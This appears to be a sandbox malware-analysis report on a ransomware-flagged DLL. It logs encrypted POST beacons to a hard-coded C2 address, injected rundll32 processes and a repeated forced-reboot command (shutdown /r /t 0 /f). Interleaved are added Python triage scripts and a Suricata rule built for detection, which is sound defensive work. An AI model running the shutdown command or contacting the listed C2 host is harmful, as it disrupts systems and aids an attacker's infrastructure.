35 64 34 63 66 37 66 37 31 65 61 66 37 31 33 38 64 64 36 33 35 31 39 38 35 32 39 65 61 63 31 34 35 65 35 37 65 61 35 37 37 35 32 63 30 33 65 33 62 35 66 30 63 38 66 66 30 66 36 35 62 64 66 30 61 66 38 62 36 31 39 36 62 37 30 61 35 34 36 30 32 33 65 37 36 39 62 32 31 65 63 33 33 31 63 35 62 33 38 32 34 30 31 33 33 31 62 34 37 37 32 37 30 36 38 33 35 64 66 33 64 35 61 33 64 31 32 31 35 34 66 35 38 38 38 34 33 32 66 
31 63 66 36 33 66 64 35 39 64 64 62 38 39 65 31 31 65 64 31 30 31 63 65 31 66 38 33 31 30 62 32 33 32 38 30 63 33 39 32 34 61 37 31 37 32 36 66 31 37 34 35 64 37 32 61 38 65 63 64 62 61 62 39 37 39 64 32 33 37 63 34 32 31 63 33 66 65 36 33 34 35 64 64 61 37 62 33 62 34 34 30 30 38 32 65 31 62 30 32 62 31 65 35 66 65 36 64 61 33 30 31 38 63 30 64 63 35 38 62 62 32 64 34 61 64 31 38 64 35 38 37 66 63 61 64 30 32 38 31 37 36 35 66 31 Data Ascii: [not reproduced]
Source: unknown | TCP traffic detected without corresponding DNS query: 188.166.28.204 (50 occurrences)
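The two DNS-related findings in this section (the plain TCP connects to 8.8.8.8:53 near the top of the Networking list, and the 50 connections to 188.166.28.204 that no DNS query preceded) both fall out of a flow log joined with a DNS log. The script below is an added example, not Joe Sandbox code, that derives both. A TCP connect to a public resolver on port 53 carrying a non-DNS payload is commonly a connectivity probe made before beaconing; that reading is an inference, the report does not print the port-53 payload, so the payloads here are hypothetical, and the windowsupdate lookup is a constructed benign control.

```python
"""Network triage for this report.

Added example, not Joe Sandbox code. Two of the sandbox's network signatures
fall out of a flow log joined with a DNS log: "TCP traffic detected without
corresponding DNS query" (the beacon goes straight to 188.166.28.204, so the
C2 address is hard-coded in the sample) and "Detected non-DNS traffic on DNS
port" (the TCP connects to 8.8.8.8:53). The records are constructed to mirror
the report; the port-53 payloads are hypothetical, the report does not print
them, and the windowsupdate lookup is a made-up benign control.
"""
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsAnswer:
    ts: float
    qname: str
    ip: str


@dataclass(frozen=True)
class Flow:
    ts: float
    dst: str
    dport: int
    proto: str
    payload: bytes = b""


def dns_tcp_query(name: str, txid: int = 0x1234) -> bytes:
    """Minimal A query framed for TCP (RFC 1035 4.2.2: two-byte length prefix)."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    msg = header + qname + struct.pack(">HH", 1, 1)
    return struct.pack(">H", len(msg)) + msg


def looks_like_dns_over_tcp(payload: bytes) -> bool:
    """Structural check only: framing length matches, a header is present,
    QDCOUNT >= 1 and the first question name parses up to its zero label."""
    if len(payload) < 14:
        return False
    if struct.unpack(">H", payload[:2])[0] != len(payload) - 2:
        return False
    if struct.unpack(">H", payload[6:8])[0] < 1:
        return False
    i = 14
    while i < len(payload):
        n = payload[i]
        if n == 0:
            return i + 1 + 4 <= len(payload)  # QTYPE and QCLASS must follow
        if n >= 64:  # over-long label or compression pointer: not a plain query
            return False
        i += 1 + n
    return False


DNS_LOG = [DnsAnswer(0.0, "ctldl.windowsupdate.com", "13.107.4.50")]  # constructed
FLOWS = [
    Flow(1.0, "13.107.4.50", 80, "tcp"),                              # resolved first: fine
    Flow(2.0, "188.166.28.204", 80, "tcp", b"POST / HTTP/1.1\r\n"),   # never resolved
    Flow(3.0, "8.8.8.8", 53, "tcp", b"\x00\x04ping"),                 # hypothetical non-DNS blob
    Flow(4.0, "8.8.8.8", 53, "tcp", dns_tcp_query("example.com")),    # well-formed DNS over TCP
]


def unresolved_connections(flows: list, dns_log: list, window: float = 300.0) -> list:
    """Flows to an address that no DNS answer returned in the `window` seconds
    before the connect. Port 53 is skipped: resolver addresses come from the
    network configuration, not from DNS."""
    return [f for f in flows if f.dport != 53
            and not any(a.ip == f.dst and f.ts - window <= a.ts <= f.ts for a in dns_log)]


def non_dns_on_port_53(flows: list) -> list:
    """TCP flows to port 53 whose first bytes are not a DNS message."""
    return [f for f in flows if f.dport == 53 and f.proto == "tcp"
            and not looks_like_dns_over_tcp(f.payload)]


if __name__ == "__main__":
    for f in unresolved_connections(FLOWS, DNS_LOG):
        print("no DNS answer before connect to", f.dst)
    for f in non_dns_on_port_53(FLOWS):
        print("non-DNS payload on tcp/53 to", f.dst, f.payload[:8])
```

The DNS-correlation window is the one knob worth tuning: too short and cached resolutions from before the capture window look "unresolved", too long and the check loses its value. The port-53 check is deliberately structural rather than a full parser; its job is to separate DNS-over-TCP from an arbitrary blob, not to validate DNS.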
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 6_2_00416896: socket, setsockopt, setsockopt, connect, send, select, recv, closesocket
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Host: 188.166.28.204 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 | Content-Type: application/x-www-form-urlencoded | Content-Length: 0
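The five non-empty POST bodies above (two of them byte-identical) decode from their Data Raw dumps to lowercase-hex strings that all start with the same 156-character prefix, and their raw lengths after un-hexing (354, 359, 362 and 364 bytes) are not multiples of 16, which points to a stream cipher or XOR rather than a block cipher in CBC mode; the identical prefix would then be a constant plaintext header under a reused keystream, or an unencrypted fixed header. That is an inference from the captured bodies, not something the report states. The script below is an added example, not Joe Sandbox code: it parses the report's Data Raw format, verifies the double encoding, measures the shared prefix and, since no stock Suricata rule fired, turns it into a Suricata content match. Only the prefix and the eight characters that follow it in each dump are reproduced from the report; the `sid` is a placeholder.

```python
"""Beacon-body triage for this report.

Added example, not Joe Sandbox code. The report prints each POST body as
"Data Raw" (space-separated hex of the bytes on the wire) and, where it fits,
as "Data Ascii". Every body on the wire is itself a lowercase-hex string, so
the real payload is hex(ciphertext), double-encoded. This script parses the
Data Raw form, checks that double encoding, measures the prefix shared by all
beacons and turns it into a Suricata content match.
"""
from os.path import commonprefix

# Taken from the report: the first 16 bytes of one Data Raw dump, the decoded
# prefix common to every non-empty POST, the 8 characters that follow it in
# each distinct dump, and each request's Content-Length. The bodies are not
# reproduced beyond those 164 characters.
DATA_RAW_SAMPLE = "38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65"
SHARED = ("8308e0536daf5c8edd59fe3430214dffbfade4515a4a895844ec0c8edf1a11a7b48ace"
          "4bbacfc0257956dcf828b6e30489e1e85b5d91d65f09ae69f761aef2bc3ed09b26fed1"
          "27f80cfa99980d36")
BEACONS = [  # (Content-Length, decoded body excerpt)
    (708, SHARED + "d0cf137a"),
    (724, SHARED + "4e350d6e"),
    (718, SHARED + "258fbab6"),
    (728, SHARED + "79cbf1dd"),
]


def parse_data_raw(dump: str) -> bytes:
    """Turn the report's 'Data Raw' hex dump back into the bytes sent on the wire."""
    return bytes.fromhex(dump)


def is_hex_text(body: bytes) -> bool:
    """True when the wire bytes are a lowercase-hex string of even length,
    i.e. the payload was hex-encoded before being POSTed."""
    return (len(body) % 2 == 0 and body.isascii()
            and all(c in b"0123456789abcdef" for c in body))


def shared_prefix(bodies: list) -> str:
    """Longest common prefix of the decoded bodies, in hex characters."""
    return commonprefix(bodies)


def block_aligned(content_length: int, block: int = 16) -> bool:
    """Would the raw ciphertext (half the hex length) fill whole cipher blocks?"""
    return (content_length // 2) % block == 0


def suricata_rule(prefix_hex: str, sid: int = 1000001, nbytes: int = 16) -> str:
    """Content match on the start of the POST body; sid is a placeholder."""
    needle = prefix_hex[: nbytes * 2]
    return ('alert http $HOME_NET any -> $EXTERNAL_NET any '
            '(msg:"BJtPlI.dll beacon body prefix"; flow:established,to_server; '
            'http.method; content:"POST"; '
            f'http.request_body; content:"{needle}"; startswith; sid:{sid}; rev:1;)')


def summarize(beacons: list) -> dict:
    """What an analyst wants to know about the bodies before touching the binary."""
    bodies = [b for _, b in beacons]
    prefix = shared_prefix(bodies)
    return {
        "all_hex_text": all(is_hex_text(b.encode()) for b in bodies),
        "prefix_hex_chars": len(prefix),
        "prefix_raw_bytes": len(prefix) // 2,
        "raw_lengths": [cl // 2 for cl, _ in beacons],
        "any_block_aligned": any(block_aligned(cl) for cl, _ in beacons),
        "rule": suricata_rule(prefix),
    }


if __name__ == "__main__":
    print(parse_data_raw(DATA_RAW_SAMPLE).decode())
    for key, value in summarize(BEACONS).items():
        print(f"{key}: {value}")
```

A 78-byte constant at the front of every beacon is a better network fingerprint than the Chrome User-Agent (which is a stock browser string) or the bare-IP Host header; the rule keys on the first 16 raw bytes of it so that it survives a change of the variable part. If the prefix later turns out to be a bot or campaign identifier under a fixed key, the rule will need to be widened to the family rather than this one build.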
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory (each of the following in all five dumps):
  • http://188.166.28.204/
  • http://188.166.28.204/index.php/comments/feed/
  • http://188.166.28.204/index.php/feed/
  • http://188.166.28.204/index.php/wp-json/
  • http://188.166.28.204/index.php/wp-json/wp/v2/pages/11
  • http://188.166.28.204/wp-content/fonts/62c4ddbcb96bbc1fdd12fc552005f3cc.css?ver=6.7.2
  • http://188.166.28.204/wp-content/themes/vw-transport-cargo/assets/css/animate.css?ver=6.7.2
  • http://188.166.28.204/wp-content/themes/vw-transport-cargo/assets/css/blocks.css?ver=6.7.2
  • http://188.166.28.204/wp-content/themes/vw-transport-cargo/assets/css/bootstrap.css?ver=6.7.2
  • http://188.166.28.204/wp-content/themes/vw-transport-cargo/assets/css/fontawesome-all.css?ver=6.7.2
  • http://188.166.28.204/wp-content/themes/vw-transport-cargo/inc/block-patterns/css/block-frontend.css
Note: these are the asset links of a WordPress front page (theme vw-transport-cargo, ?ver=6.7.2 query strings), found only in the memory of the injected rundll32.exe processes that issued the POST / beacons, and the captured traffic shows no request for any of them. The most plausible reading is that they come from the HTML 188.166.28.204 returned to the beacon: the C2 address fronts an ordinary-looking WordPress site, so a reputation check on the bare IP may come back clean. Treat the IP, the POST / pattern and the fixed body prefix as the indicators, not the WordPress URLs.
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-content/themes/vw-transport-cargo/style.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-includes/css/dashicons.min.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-includes/css/dist/block-library/style.min.css?ver=6.7.2
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.166.28.204/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: rundll32.exe, 00000006.00000002.1325807438.0000000003364000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329247644.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1327099039.0000000002904000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303386892.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327933462.0000000002F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/

System Summary

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 80
Source: BJtPlI.dll | Static PE information: Number of sections : 11 > 10
Source: BJtPlI.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: classification engine | Classification label: mal100.rans.evad.winDLL@47/0@0/2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_004203B1 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,6_2_004203B1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0041DC40 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,CloseHandle,6_2_0041DC40
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6860
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7904
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6852
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5888
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\e5bd5825-cdb0-44e5-a3f9-d2328dfe9957
Source: BJtPlI.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8
Source: BJtPlI.dll | Virustotal: Detection: 65%
Source: BJtPlI.dll | ReversingLabs: Detection: 68%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\BJtPlI.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 80
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 80
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 80
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 80
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",cmlPc6dI8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 80
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: shutdownext.dll
Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: shutdownext.dll
Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: shutdownext.dll
Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: sspicli.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: BJtPlI.dll | Static PE information: Image base 0x683c0000 > 0x60000000
Source: BJtPlI.dll | Static PE information: real checksum: 0x462e0 should be: 0x38a4b
Source: BJtPlI.dll | Static PE information: section name: .eh_fram
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0042732E push cs; iretd 6_2_0042733A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0042C3F8 push eax; iretd 6_2_0042C3F9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0042CDC1 push eax; ret 6_2_0042CDC4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0042CD85 push ebx; ret 6_2_0042CD91
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
